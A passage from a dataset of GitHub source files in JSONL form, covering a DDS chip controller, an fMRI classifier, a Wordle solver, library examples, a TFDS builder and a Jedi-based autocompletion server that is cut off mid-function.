{self.ctl_byte:02X} - {self.freq_word:08X}\")\r\n print(f\"Frequency input / real: {self.frequency:.2f} / {round(self.freq_word*self.clock_freq/4294967296, 2):.2f}\")\r\n print(f\"Phase shift: {self.ctl_byte >> 3} = {(self.ctl_byte >> 3)*11.25} degrees\")\r\n print(\"Multiplier bit: \", end = \"\")\r\n if self.ic_name == \"AD9851\":print(self.ctl_byte & 0x1)\r\n else: print(\"-\")\r\n print(f\"Clock frequency: {self.clock_freq}\")\r\n print(f\"Power mode: {self.ctl_byte & 0x4:1X}\")\r\n\r\n def reset(self):\r\n self.iface.reset()\r\n return True\r\n\r\n def set_freq(self, freq):\r\n self.frequency = freq\r\n self.freq_word = int((freq/self.clock_freq)*4294967296) & 0xFFFFFFFF\r\n self.iface.write_reg(self.freq_word, self.ctl_byte)\r\n return True\r\n\r\n def set_pwr_sleep(self, sleep_bit):\r\n print(\"Set to sleep set to \", sleep_bit)\r\n if sleep_bit:\r\n self.ctl_byte |= 0x04\r\n else:\r\n self.ctl_byte &= 0xFB\r\n self.iface.reset()\r\n \r\n self.iface.write_reg(self.freq_word, self.ctl_byte & self.ctl_mask)\r\n return True\r\n\r\n def set_multiplier(self, mp_bit):\r\n if mp_bit:\r\n self.ctl_byte |= 0x01\r\n self.clock_freq = 6 * self.sys_clock\r\n else:\r\n self.ctl_byte &= 0xFE\r\n self.clock_freq = self.sys_clock\r\n\r\n self.set_freq(self.frequency)\r\n return True\r\n \r\n def set_phase_shift(self, n):\r\n self.phase_shift = n\r\n self.ctl_byte = (self.ctl_byte & 0x07 | n << 3) & self.ctl_mask\r\n self.iface.write_reg(self.freq_word, self.ctl_byte)\r\n return True\r\n\r\n def set_reg_vals(self):\r\n print(f\"{self.ctl_byte:02X} {self.freq_word:08X}\")\r\n self.iface.write_reg(self.freq_word, self.ctl_byte)\r\n return True\r\n\r\nclass AD9851(AD98x): # parameters for AD9851\r\n ic_name = 'AD9851'\r\n sys_clock = AD9851_clock\r\n \r\n def __init__(self, iface):\r\n super().__init__(iface)\r\n self.ctl_byte = 0x01 # set multiplier bit\r\n self.clock_freq = 6 * self.sys_clock\r\n self.ctl_mask = 0xFD # to ensure ctrl bit 1 == 0\r\n self.set_freq(start_freq)\r\n \r\nclass AD9850(AD98x): # parameters for AD9850\r\n ic_name = 'AD9850'\r\n sys_clock = AD9850_clock\r\n \r\n def __init__(self, iface):\r\n super().__init__(iface)\r\n self.ctl_byte = 0x0\r\n self.ctl_mask = 0xFC # to ensure ctrl bit 0 and 1 == 0\r\n self.set_freq(start_freq)\r\n\r\n def set_multiplier(self, n):\r\n print(\"Error: multiplier bit not allowed for \", AD9850.ic_name)\r\n return True\r\n \r\n#=======================\r\n\r\ndef main():\r\n if pin_factory != \"rpigpio\":\r\n os.environ[\"GPIOZERO_PIN_FACTORY\"] = pin_factory\r\n os.environ[\"PIGPIO_ADDR\"] = ip_addr\r\n else:\r\n pass # do nothing - rpigpio is default pin factory\r\n \r\n # system interface A or B: logical functions AD98x and low level IO\r\n\r\n if VCO_A == \"AD9851\":\r\n sif_A = AD9851(GpioADxIf(gif_A))\r\n else:\r\n sif_A = AD9850(GpioADxIf(gif_A)) \r\n\r\n if VCO_B != None:\r\n if VCO_B == \"AD9851\":\r\n sif_B = AD9851(GpioADxIf(gif_B)) # sif system interface RPi - VCO\r\n else:\r\n sif_B = AD9850(GpioADxIf(gif_B))\r\n \r\n ## user interface\r\n uif = parse(sif_A, sif_B)\r\n # start program\r\n uif.get_cmd()\r\n \r\nif __name__ =='__main__':\r\n main()\r\n","repo_name":"Bevedel/AD985x-Utility","sub_path":"AD985x.py","file_name":"AD985x.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"440201545","text":"from pydoc import doc\nimport pandas as pd\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\nimport matplotlib.pyplot as plt\n#from gensim.models import KeyedVectors\nimport pickle as pk\nimport nibabel as nib\nimport pandas as pd\nimport numpy as np\nimport random\nfrom scipy import stats\nfrom statsmodels.stats.multitest import multipletests\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport sys\nfrom sklearn.linear_model import Ridge\nfrom sklearn.utils import shuffle\nimport argparse\nimport sys\nfrom sklearn.linear_model import RidgeCV\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nfrom scipy import stats\nfrom sklearn.model_selection import LeaveOneOut\nimport time\nimport os.path\nfrom sklearn.model_selection import StratifiedShuffleSplit \nfrom sklearn import metrics\nfrom sklearn.linear_model import LogisticRegression\nimport seaborn as sns\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.utils import shuffle\nfrom ast import literal_eval\n\n\ndef cross_validaton_logreg(X, y):\n \n \n X, y = shuffle(X, y)\n best_alphas = []\n results = []\n precision = []\n recall = []\n cm = []\n y_tests, y_preds = [], []\n \n for i in range(5):\n test_indices = np.random.random_integers(0, 159, 32)\n train_indices = list(range(0,160))\n for index in sorted(test_indices, reverse = True):\n del train_indices[index]\n \n X_train, X_test = [], []\n y_train, y_test = [], []\n\n for index in train_indices:\n X_train.append(X[index])\n y_train.append(y[index])\n\n for index in test_indices:\n X_test.append(X[index])\n y_test.append(y[index])\n \n model = LogisticRegression(class_weight='balanced', random_state=i,solver = 'lbfgs', penalty = 'l2',max_iter=500, n_jobs=-1)\n scoring = 'accuracy'\n ridge_params = {'C': [0.001,0.01, 0.1, 1, 10, 100,1000]}\n clf = GridSearchCV(model, ridge_params, scoring=scoring, n_jobs=-1, cv=4)\n\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n \n pca = PCA(n_components = 0.85)\n pca.fit(X_train)\n X_train = pca.transform(X_train)\n X_test = pca.transform(X_test)\n\n clf.fit(X_train,y_train)\n best_alphas.append(clf.best_params_)\n print(clf.best_params_)\n y_pred = clf.predict(X_test)\n\n testScore = metrics.accuracy_score(y_test, y_pred)\n precision_score = metrics.precision_score(y_test, y_pred, average = 'weighted')\n recall_score = metrics.recall_score(y_test, y_pred, average = 'weighted')\n\n results.append(testScore)\n precision.append(precision_score)\n recall.append(recall_score)\n\n print(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n print(\"Precision:\",precision_score)\n print(\"Recall:\",recall_score)\n\n #Confusion Matrix\n cnf_matrix = metrics.confusion_matrix(y_test, y_pred, normalize = 'true')\n print(cnf_matrix)\n cm.append(cnf_matrix)\n y_tests.append(y_test)\n y_preds.append(y_pred)\n \n y_tests = np.array(y_tests)\n y_preds = np.array(y_preds)\n \n cm = np.array(cm)\n \n return y_tests,y_preds, cm\n\ncontrol_p = ['P054','P057','P064','P065','P067','P068','P072','P073','P075','P076','P080','P081']\nASD_p = ['P050','P055','P056','P059','P069','P070','P071','P078','P079']\nall_participants = sorted(ASD_p + control_p)\n\nbeta_dir = '/home/varshini/projects/def-afyshe-ab/varshini/glucks/data/results_betas/betas_all/'\nout_dir = 'clf_apr_18'\noutput_dir = '/home/varshini/projects/def-afyshe-ab/varshini/glucks/clf_jul/' + out_dir + '/'\n\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n\ncorr_dir = output_dir\ngroup = all_participants\nreg_names = ['AG','IFG','ROI','dACC']\nclass_labels = [0]*80 + [1]*40 + [2]*20 + [3]*20\n# LT LF M SM\n\nfor participant in group:\n\n print(participant)\n p_start = time.time()\n \n with open(beta_dir + 'all_betas_' + participant + '.pkl','rb') as f:\n all_betas = pk.load(f)\n \n #ROI\n X, y = all_betas[2], class_labels\n \n file_name_pred = output_dir + participant + '_' + reg_names[2] +'_pred.pkl'\n file_name_true = output_dir + participant + '_' + reg_names[2] +'_true.pkl'\n file_name_cm = output_dir + participant + '_' + reg_names[2] +'_cm.pkl'\n\n y_tests, y_preds, cm = cross_validaton_logreg(X,y)\n with open(file_name_pred,'wb') as f:\n pk.dump(y_preds, f)\n\n with open(file_name_true,'wb') as f:\n pk.dump(y_tests, f)\n\n with open(file_name_cm,'wb') as f:\n pk.dump(cm, f)\n \n\n\n\n","repo_name":"varshini-prakash/thesis_glucksberg","sub_path":"old_clf.py","file_name":"old_clf.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22755317124","text":"import solver\nfrom solver import GuessState, join_by_coma\nfrom words import WORDS\n\nfrom random import sample\nimport typer\n\napp = typer.Typer()\n\n\n@app.command()\ndef start():\n \"\"\"Sugguest initial guess.\"\"\"\n typer.echo(\"\".join(solver.startword(WORDS)))\n\n\n@app.command()\ndef nextGuess(\n pattern: str,\n exclude: str = None,\n include: str = None,\n posExclude: str = None,\n single: bool = False,\n print: bool = False,\n):\n \"\"\"Suggest next guess based on current state.\"\"\"\n posExcludeDict = solver.string_param_to_dict(posExclude)\n hints = filter(lambda x: solver.match(pattern, x), WORDS)\n hints = filter(lambda x: solver.excludes(exclude, x), hints)\n hints = filter(lambda x: solver.has(include, x), hints)\n hints = filter(lambda x: solver.not_at(posExcludeDict, x), hints)\n hints = list(sorted(hints))\n result = []\n if single and hints:\n result = [\",\".join(sample(hints, 1)[0])]\n else:\n result = [\",\".join(hint) for hint in hints]\n if print:\n typer.echo(\"\\n\".join(result))\n return result\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"cinegemadar/szozat-solver","sub_path":"solver_cli.py","file_name":"solver_cli.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22296112601","text":"#!/usr/bin/env python\nimport shogun as sg\n\nstrings=['example document 1','example document 2','example document 3','example document 4']\n\nparameter_list=[[strings]]\n\ndef converter_hasheddoc(strings):\n\t#create string features\n\tf=sg.create_string_features(strings, sg.RAWBYTE, sg.PT_CHAR)\n\n\t#set the number of bits of the target dimension\n\t#means a dim of size 2^5=32\n\tnum_bits=5\n\n\t#create the ngram tokenizer of size 8 to parse the strings\n\ttokenizer=sg.NGramTokenizer(8)\n\n\t#normalize results\n\tnormalize=True\n\n\t#create converter\n\tconverter = sg.create_transformer('HashedDocConverter', tokenizer=tokenizer, num_bits=num_bits, should_normalize=normalize)\n\n\tconverted_feats=converter.transform(f)\n\n\t#should expect 32\n\t#print('Converted features\\' space dimensionality is', converted_feats.get_dim_feature_space())\n\n\t#print('Self dot product of string 0 with converted feats:', converted_feats.dot(0, converted_feats, 0))\n\n\thashed_feats=sg.create_features(\"HashedDocDotFeatures\", num_bits=num_bits, \n\t\t\t\t\t\t\t\t\tdoc_collection=f, tokenizer=tokenizer, \n\t\t\t\t\t\t\t\t\tshould_normalize=normalize)\n\n\t#print('Hashed features\\' space dimensionality is', hashed_feats.get_dim_feature_space())\n\n\t#print('Self dot product of string 0 with hashed feats:', hashed_feats.dot(0, hashed_feats, 0))\n\n\treturn converted_feats\n\nif __name__=='__main__':\n\tprint('HashedDocConverter')\n\tconverter_hasheddoc(*parameter_list[0])\n\n\n","repo_name":"shogun-toolbox/shogun","sub_path":"examples/undocumented/python/converter_hasheddoc.py","file_name":"converter_hasheddoc.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":2975,"dataset":"github-code","pt":"75"} +{"seq_id":"678686330","text":"from utils.spark_app import MovieDataApp\n\n\nspark = MovieDataApp().spark\n\ndef get_movie_year_factor(cate_id):\n movie_data = spark.sql(\"select * from movie.db_asset\").select('id', 'year')\n import numpy as np\n from datetime import datetime\n now_year = datetime.today().year\n\n def extract_movie_year(row):\n try:\n movie_year = int(row.year)\n if movie_year <= 0 or movie_year > now_year:\n movie_year = now_year - 5 # 认为没有year的电影可能不是特别新的和重要的,适当的 -5\n except:\n movie_year = now_year - 5 # 对没有year或者year异常的(0或者大于2020)给一个适合的year(自选一个)\n deltayear = now_year - movie_year\n\n # 衰减因子\n if cate_id == 1971:\n # 采用以2为底的对数,在接近当前年份时,放大衰减系数,远离目前年份时趋于稳定(e和10为底的衰减速率太慢)\n # 采用大的衰减速率有利于 增大近期综艺的权重,(认为综艺时效性很重要,去年的综艺看的人很少)\n year_exp = 1 / (np.log2(deltayear + 1) + 1)\n else:\n # 采用指数加权,调整指数范围大概在 2^0.1 ~ 2^5 (1970~2020)之间,即 1 ~ 32 倍,选2为底防止倍数放大太多\n # 指数加权,可以使年代久的电影权重偏低更多\n year_exp = 1 / (2 ** (deltayear / 10)) # 为了使指数域在0.1~5,对 deltayear 除以10\n return row.id, row.year, round(float(year_exp), 4)\n\n tmp_table = movie_data.rdd.map(extract_movie_year).toDF(['movie_id', 'year', 'factor'])\n\n return tmp_table","repo_name":"hfhfn/db_recommend","sub_path":"online_recommend/stat_factor/movie_year.py","file_name":"movie_year.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42634393060","text":"\"\"\"Data sets of the Multi-Dimensional Signal Processing Research Group (MDSP) for Video\nSuper-Resolution.\"\"\"\n\nimport numpy as np\nimport scipy.io\nimport tensorflow_datasets as tfds\n\n_DESCRIPTION = \"\"\"\nThe data sets have been gathered during the past several years in the Multi-Dimensional Signal\nProcessing Research Group (MDSP).\n\"\"\"\n\n_CITATION = \"\"\"\n@misc{mdsp_milanfar,\n title={Peyman Milanfar},\n url={http://www.soe.ucsc.edu/~milanfar/software/sr-datasets.html},\n journal={MDSP Super-Resolution And Demosaicing Datasets :: Peyman Milanfar}\n}\n\"\"\"\n\nNAMES = {\n \"face_adyoron_1\": \"Color Face 1\",\n \"face_adyoron_2\": \"Color Face 2\",\n \"Adyoron_small\": \"Surveillance (Small)\",\n \"Book_case1_small\": \"Bookcase 1 (Small)\",\n \"Book_case1\": \"Bookcase 1\",\n}\nDOWNLOAD_PATHS = {\n k: f\"https://users.soe.ucsc.edu/~milanfar/software/datasets/{k}.mat\"\n for k in NAMES.keys()\n}\n\n\nclass MdspColorSr(tfds.core.GeneratorBasedBuilder):\n \"\"\"DatasetBuilder for mdsp_color_sr dataset.\"\"\"\n\n VERSION = tfds.core.Version(\"0.0.1\")\n RELEASE_NOTES = {\n \"0.0.1\": \"Alpha release.\",\n }\n\n def _info(self) -> tfds.core.DatasetInfo:\n \"\"\"Returns the dataset metadata.\"\"\"\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict(\n {\n \"video\": tfds.features.Video(shape=(None, None, None, 3)),\n }\n ),\n homepage=\"https://users.soe.ucsc.edu/~milanfar/software/sr-datasets.html\",\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager: tfds.download.DownloadManager):\n \"\"\"Returns SplitGenerators.\"\"\"\n paths = dl_manager.download(DOWNLOAD_PATHS)\n\n return {\n \"test\": self._generate_examples(paths),\n }\n\n def _generate_examples(self, paths):\n \"\"\"Yields examples.\"\"\"\n for key, path in paths.items():\n video = scipy.io.loadmat(path)\n video = video[key]\n video = np.transpose(video, axes=[3, 0, 1, 2])\n print(video.dtype)\n yield NAMES[key], {\"video\": video}\n","repo_name":"HedgehogCode/tensorflow-datasets-bw","sub_path":"tensorflow_datasets_bw/mdsp_color_sr/mdsp_color_sr.py","file_name":"mdsp_color_sr.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"75300288563","text":"import os\nimport io\nimport re\nimport sys\nimport json\nimport traceback\nimport platform\n\njediPreview = False\n\nclass RedirectStdout(object):\n def __init__(self, new_stdout=None):\n \"\"\"If stdout is None, redirect to /dev/null\"\"\"\n self._new_stdout = new_stdout or open(os.devnull, 'w')\n\n def __enter__(self):\n sys.stdout.flush()\n self.oldstdout_fno = os.dup(sys.stdout.fileno())\n os.dup2(self._new_stdout.fileno(), 1)\n\n def __exit__(self, exc_type, exc_value, traceback):\n self._new_stdout.flush()\n os.dup2(self.oldstdout_fno, 1)\n os.close(self.oldstdout_fno)\n\nclass JediCompletion(object):\n basic_types = {\n 'module': 'import',\n 'instance': 'variable',\n 'statement': 'value',\n 'param': 'variable',\n }\n\n def __init__(self):\n self.default_sys_path = sys.path\n self.environment = jedi.api.environment.Environment(sys.prefix, sys.executable)\n self._input = io.open(sys.stdin.fileno(), encoding='utf-8')\n if (os.path.sep == '/') and (platform.uname()[2].find('Microsoft') > -1):\n # WSL; does not support UNC paths\n self.drive_mount = '/mnt/'\n elif sys.platform == 'cygwin':\n # cygwin\n self.drive_mount = '/cygdrive/'\n else:\n # Do no normalization, e.g. Windows build of Python.\n # Could add additional test: ((os.path.sep == '/') and os.path.isdir('/mnt/c'))\n # However, this may have more false positives trying to identify Windows/*nix hybrids\n self.drive_mount = ''\n\n def _get_definition_type(self, definition):\n # if definition.type not in ['import', 'keyword'] and is_built_in():\n # return 'builtin'\n try:\n if definition.type in ['statement'] and definition.name.isupper():\n return 'constant'\n return self.basic_types.get(definition.type, definition.type)\n except Exception:\n return 'builtin'\n\n def _additional_info(self, completion):\n \"\"\"Provide additional information about the completion object.\"\"\"\n if not hasattr(completion, '_definition') or completion._definition is None:\n return ''\n if completion.type == 'statement':\n nodes_to_display = ['InstanceElement', 'String', 'Node', 'Lambda',\n 'Number']\n return ''.join(c.get_code() for c in\n completion._definition.children if type(c).__name__\n in nodes_to_display).replace('\\n', '')\n return ''\n\n @classmethod\n def _get_top_level_module(cls, path):\n \"\"\"Recursively walk through directories looking for top level module.\n\n Jedi will use current filepath to look for another modules at same\n path, but it will not be able to see modules **above**, so our goal\n is to find the higher python module available from filepath.\n \"\"\"\n _path, _ = os.path.split(path)\n if os.path.isfile(os.path.join(_path, '__init__.py')):\n return cls._get_top_level_module(_path)\n return path\n\n def _generate_signature(self, completion):\n \"\"\"Generate signature with function arguments.\n \"\"\"\n if completion.type in ['module'] or not hasattr(completion, 'params'):\n return ''\n return '%s(%s)' % (\n completion.name,\n ', '.join(p.description[6:] for p in completion.params if p))\n\n def _get_call_signatures(self, script):\n \"\"\"Extract call signatures from jedi.api.Script object in failsafe way.\n\n Returns:\n Tuple with original signature object, name and value.\n \"\"\"\n _signatures = []\n try:\n call_signatures = script.call_signatures()\n except KeyError:\n call_signatures = []\n except :\n call_signatures = []\n for signature in call_signatures:\n for pos, param in enumerate(signature.params):\n if not param.name:\n continue\n\n name = self._get_param_name(param)\n if param.name == 'self' and pos == 0:\n continue\n if name.startswith('*'):\n continue\n\n value = self._get_param_value(param)\n _signatures.append((signature, name, value))\n return _signatures\n\n def _get_param_name(self, p):\n if(p.name.startswith('param ')):\n return p.name[6:] # drop leading 'param '\n return p.name\n\n def _get_param_value(self, p):\n pair = p.description.split('=')\n if(len(pair) > 1):\n return pair[1]\n return None\n\n def _get_call_signatures_with_args(self, script):\n \"\"\"Extract call signatures from jedi.api.Script object in failsafe way.\n\n Returns:\n Array with dictionary\n \"\"\"\n _signatures = []\n try:\n call_signatures = script.call_signatures()\n except KeyError:\n call_signatures = []\n for signature in call_signatures:\n sig = {\"name\": \"\", \"description\": \"\", \"docstring\": \"\",\n \"paramindex\": 0, \"params\": [], \"bracketstart\": []}\n sig[\"description\"] = signature.description\n try:\n sig[\"docstring\"] = signature.docstring()\n sig[\"raw_docstring\"] = signature.docstring(raw=True)\n except Exception:\n sig[\"docstring\"] = ''\n sig[\"raw_docstring\"] = ''\n\n sig[\"name\"] = signature.name\n sig[\"paramindex\"] = signature.index\n sig[\"bracketstart\"].append(signature.index)\n\n _signatures.append(sig)\n for pos, param in enumerate(signature.params):\n if not param.name:\n continue\n\n name = self._get_param_name(param)\n if param.name == 'self' and pos == 0:\n continue\n\n value = self._get_param_value(param)\n paramDocstring = ''\n try:\n paramDocstring = param.docstring()\n except Exception:\n paramDocstring = ''\n\n sig[\"params\"].append({\"name\": name, \"value\": value, \"docstring\": paramDocstring, \"description\": param.description})\n return _signatures\n\n def _serialize_completions(self, script, identifier=None, prefix=''):\n \"\"\"Serialize response to be read from VSCode.\n\n Args:\n script: Instance of jedi.api.Script object.\n identifier: Unique completion identifier to pass back to VSCode.\n prefix: String with prefix to filter function arguments.\n Used only when fuzzy matcher turned off.\n\n Returns:\n Serialized string to send to VSCode.\n \"\"\"\n _completions = []\n\n for signature, name, value in self._get_call_signatures(script):\n if not self.fuzzy_matcher and not name.lower().startswith(\n prefix.lower()):\n continue\n _completion = {\n 'type': 'property',\n 'raw_type': '',\n 'rightLabel': self._additional_info(signature)\n }\n _completion['description'] = ''\n _completion['raw_docstring'] = ''\n\n # we pass 'text' here only for fuzzy matcher\n if value:\n _completion['snippet'] = '%s=${1:%s}$0' % (name, value)\n _completion['text'] = '%s=' % (name)\n else:\n _completion['snippet'] = '%s=$1$0' % name\n _completion['text'] = name\n _completion['displayText'] = name\n _completions.append(_completion)\n\n try:\n completions = script.completions()\n except KeyError:\n completions = []\n except :\n completions = []\n for completion in completions:\n try:\n _completion = {\n 'text': completion.name,\n 'type': self._get_definition_type(completion),\n 'raw_type': completion.type,\n 'rightLabel': self._additional_info(completion)\n }\n except Exception:\n continue\n\n for c in _completions:\n if c['text'] == _completion['text']:\n c['type'] = _completion['type']\n c['raw_type'] = _completion['raw_type']\n\n if any([c['text'].split('=')[0] == _completion['text']\n for c in _completions]):\n # ignore function arguments we already have\n continue\n _completions.append(_completion)\n return json.dumps({'id': identifier, 'results': _completions})\n\n def _serialize_methods(self, script, identifier=None, prefix=''):\n _methods = []\n try:\n completions = script.completions()\n except KeyError:\n return []\n\n for completion in completions:\n if completion.name == '__autocomplete_python':\n instance = completion.parent().name\n break\n else:\n instance = 'self.__class__'\n\n for completion in completions:\n params = []\n if hasattr(completion, 'params'):\n params = [p.description for p in completion.params if p]\n if completion.parent().type == 'class':\n _methods.append({\n 'parent': completion.parent().name,\n 'instance': instance,\n 'name': completion.name,\n 'params': params,\n 'moduleName': completion.module_name,\n 'fileName': completion.module_path,\n 'line': completion.line,\n 'column': completion.column,\n })\n return json.dumps({'id': identifier, 'results': _methods})\n\n def _serialize_arguments(self, script, identifier=None):\n \"\"\"Serialize response to be read from VSCode.\n\n Args:\n script: Instance of jedi.api.Script object.\n identifier: Unique completion identifier to pass back to VSCode.\n\n Returns:\n Serialized string to send to VSCode.\n \"\"\"\n return json.dumps({\"id\": identifier, \"results\": self._get_call_signatures_with_args(script)})\n\n def _top_definition(self, definition):\n for d in definition.goto_assignments():\n if d == definition:\n continue\n if d.type == 'import':\n return self._top_definition(d)\n else:\n return d\n return definition\n\n def _extract_range_jedi_0_11_1(self, definition):\n from parso.utils import split_lines\n # get the scope range\n try:\n if definition.type in ['class', 'function']:\n tree_name = definition._name.tree_name\n scope = tree_name.get_definition()\n start_line = scope.start_pos[0] - 1\n start_column = scope.start_pos[1]\n # get the lines\n code = scope.get_code(include_prefix=False)\n lines = split_lines(code)\n # trim the lines\n lines = '\\n'.join(lines).rstrip().split('\\n')\n end_line = start_line + len(lines) - 1\n end_column = len(lines[-1]) - 1\n else:\n symbol = definition._name.tree_name\n start_line = symbol.start_pos[0] - 1\n start_column = symbol.start_pos[1]\n end_line = symbol.end_pos[0] - 1\n end_column = symbol.end_pos[1]\n return {\n 'start_line': start_line,\n 'start_column': start_column,\n 'end_line': end_line,\n 'end_column': end_column\n }\n except Exception as e:\n return {\n 'start_line': definition.line - 1,\n 'start_column': definition.column,\n 'end_line': definition.line - 1,\n 'end_column': definition.column\n }\n\n def _extract_range(self, definition):\n \"\"\"Provides the definition range of a given definition\n\n For regular symbols it returns the start and end location of the\n characters making up the symbol.\n\n For scoped containers it will return the entire definition of the\n scope.\n\n The scope that jedi provides ends with the first character of the next\n scope so it's not ideal. For vscode we need the scope to end with the\n last character of actual code. That's why we extract the lines that\n make up our scope and trim the trailing whitespace.\n \"\"\"\n return self._extract_range_jedi_0_11_1(definition)\n\n def _get_definitionsx(self, definitions, identifier=None, ignoreNoModulePath=False):\n \"\"\"Serialize response to be read from VSCode.\n\n Args:\n definitions: List of jedi.api.classes.Definition objects.\n identifier: Unique completion identifier to pass back to VSCode.\n\n Returns:\n Serialized string to send to VSCode.\n \"\"\"\n _definitions = []\n for definition in definitions:\n try:\n if definition.type == 'import':\n definition = self._top_definition(definition)\n definitionRange = {\n 'start_line': 0,\n 'start_column': 0,\n 'end_line': 0,\n 'end_column': 0\n }\n module_path = ''\n if hasattr(definition, 'module_path') and definition.module_path:\n module_path = definition.module_path\n definitionRange = self._extract_range(definition)\n else:\n if not ignoreNoModulePath:\n continue\n try:\n parent = definition.parent()\n container = parent.name if parent.type != 'module' else ''\n except Exception:\n container = ''\n\n try:\n docstring = definition.docstring()\n rawdocstring = definition.docstring(raw=True)\n except Exception:\n docstring = ''\n rawdocstring = ''\n _definition = {\n 'text': definition.name,\n 'type': self._get_definition_type(definition),\n 'raw_type': definition.type,\n 'fileName': module_path,\n 'container': container,\n 'range': definitionRange,\n 'description': definition.description,\n 'docstring': docstring,\n 'raw_docstring': rawdocstring,\n 'signature': self._generate_signature(definition)\n }\n _definitions.append(_definition)\n except Exception as e:\n pass\n return _definitions\n\n def _serialize_definitions(self, definitions, identifier=None):\n \"\"\"Serialize response to be read from VSCode.\n\n Args:\n definitions: List of jedi.api.classes.Definition objects.\n identifier: Unique completion identifier to pass back to VSCode.\n\n Returns:\n Serialized string to send to VSCode.\n \"\"\"\n _definitions = []\n for definition in definitions:\n try:\n if definition.module_path:\n if definition.type == 'import':\n definition = self._top_definition(definition)\n if not definition.module_path:\n continue\n try:\n parent = definition.parent()\n container = parent.name if parent.type != 'module' else ''\n except Exception:\n container = ''\n\n try:\n docstring = definition.docstring()\n rawdocstring = definition.docstring(raw=True)\n except Exception:\n docstring = ''\n rawdocstring = ''\n _definition = {\n 'text': definition.name,\n 'type': self._get_definition_type(definition),\n 'raw_type': definition.type,\n 'fileName': definition.module_path,\n 'container': container,\n 'range': self._extract_range(definition),\n 'description': definition.description,\n 'docstring': docstring,\n 'raw_docstring': rawdocstring\n }\n _definitions.append(_definition)\n except Exception as e:\n pass\n return json.dumps({'id': identifier, 'results': _definitions})\n\n def _serialize_tooltip(self, definitions, identifier=None):\n _definitions = []\n for definition in definitions:\n signature = definition.name\n description = None\n if definition.type in ['class', 'function']:\n signature = self._generate_signature(definition)\n try:\n description = definition.docstring(raw=True).strip()\n except Exception:\n description = ''\n if not description and not hasattr(definition, 'get_line_code'):\n # jedi returns an empty string for compiled objects\n description = definition.docstring().strip()\n if definition.type == 'module':\n signature = definition.full_name\n try:\n description = definition.docstring(raw=True).strip()\n except Exception:\n description = ''\n if not description and hasattr(definition, 'get_line_code'):\n # jedi returns an empty string for compiled objects\n description = definition.docstring().strip()\n _definition = {\n 'type': self._get_definition_type(definition),\n 'text': definition.name,\n 'description': description,\n 'docstring': description,\n 'signature': signature\n }\n _definitions.append(_definition)\n return json.dumps({'id': identifier, 'results': _definitions})\n\n def _serialize_usages(self, usages, identifier=None):\n _usages = []\n for usage in usages:\n _usages.append({\n 'name': usage.name,\n 'moduleName': usage.module_name,\n 'fileName': usage.module_path,\n 'line': usage.line,\n 'column': usage.column,\n })\n return json.dumps({'id': identifier, 'results': _usages})\n\n def _deserialize(self, request):\n \"\"\"Deserialize request from VSCode.\n\n Args:\n request: String with raw request from VSCode.\n\n Returns:\n Python dictionary with request data.\n \"\"\"\n return json.loads(request)\n\n def _set_request_config(self, config):\n \"\"\"Sets config values for current request.\n\n This includes sys.path modifications which is getting restored to\n default value on each request so each project should be isolated\n from each other.\n\n Args:\n config: Dictionary with config values.\n \"\"\"\n sys.path = self.default_sys_path\n self.use_snippets = config.get('useSnippets')\n self.show_doc_strings = config.get('showDescriptions', True)\n self.fuzzy_matcher = config.get('fuzzyMatcher', False)\n jedi.settings.case_insensitive_completion = config.get(\n 'caseInsensitiveCompletion', True)\n for path in config.get('extraPaths', []):\n if path and path not in sys.path:\n sys.path.insert(0, path)\n\n def _normalize_request_path(self, request):\n \"\"\"Normalize any Windows paths received by a *nix build of\n Python. Does not alter the reverse os.path.sep=='\\\\',\n i.e. *nix paths received by a Windows build of Python.\n \"\"\"\n if 'path' in request:\n if not self.drive_mount:\n return\n newPath = request['path'].replace('\\\\', '/')\n if newPath[0:1] == '/':\n # is absolute path with no drive letter\n request['path'] = newPath\n elif newPath[1:2] == ':':\n # is path with drive letter, only absolute can be mapped\n request['path'] = self.drive_mount + newPath[0:1].lower() + newPath[2:]\n else:\n # is relative path\n request['path'] = newPath\n\n def _process_request(self, request):\n \"\"\"Accept serialized request from VSCode and write response.\n \"\"\"\n request = self._deserialize(request)\n\n self._set_request_config(request.get('config', {}))\n\n self._normalize_request_path(request)\n path = self._get_top_level_module(request.get('path', ''))\n if len(path) > 0 and path not in sys.path:\n sys.path.insert(0, path)\n lookup = request.get('lookup', 'completions')\n\n if lookup == 'names':\n return self._serialize_definitions(\n jedi.api.names(\n source=request.get('source', None),\n path=request.get('path', ''),\n all_scopes=True),\n request['id'])\n\n script = jedi.Script(\n source=request.get('source', None), line=request['line'] + 1,\n column=request['column'], path=request.get('path', ''),\n sys_path=sys.path, environment=self.environment)\n\n if lookup == 'definitions':\n defs = self._get_definitionsx(script.goto_assignments(follow_imports=True), request['id'])\n return json.dumps({'id': request['id'], 'results': defs})\n if lookup == 'tooltip':\n if jediPreview:\n defs = []\n try:\n defs = self._get_definitionsx(script.goto_definitions(), request['id'], True)\n except:\n pass\n try:\n if len(defs) == 0:\n defs = self._get_definitionsx(script.goto_assignments(), request['id'], True)\n except:\n pass\n return json.dumps({'id': request['id'], 'results': defs})\n else:\n try:\n return 